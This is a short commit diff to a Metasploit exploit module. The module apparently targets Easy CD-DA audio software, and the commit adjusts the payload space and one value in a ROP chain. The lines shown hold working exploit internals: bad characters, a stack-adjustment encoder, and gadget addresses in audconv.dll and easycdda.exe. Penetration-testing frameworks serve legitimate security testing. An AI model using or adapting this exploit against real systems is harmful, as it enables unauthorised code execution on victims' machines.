Fix payload size

bug/bundler_fix
sgabe 2014-02-11 23:42:58 +01:00
parent 3717374896
commit 184ccb9e1e
1 changed files with 2 additions and 2 deletions

View File

@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
{
'DisableNops' => true,
'BadChars' => "\x0a\x3d",
'Space' => 2472,
'Space' => 2454,
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Targets' =>
@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
0x1005d288, # POP EBP # RETN [audconv.dll]
0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]
0x1005cc2d, # POP EBX # RETN [audconv.dll]
0x000009ff, # 0x000009FF-> EBX
0x00000996, # 0x00000996-> EBX
0x1008740c, # POP EDX # RETN [audconv.dll]
0x00000040, # 0x00000040-> EDX
0x1001826d, # POP ECX # RETN [audconv.dll]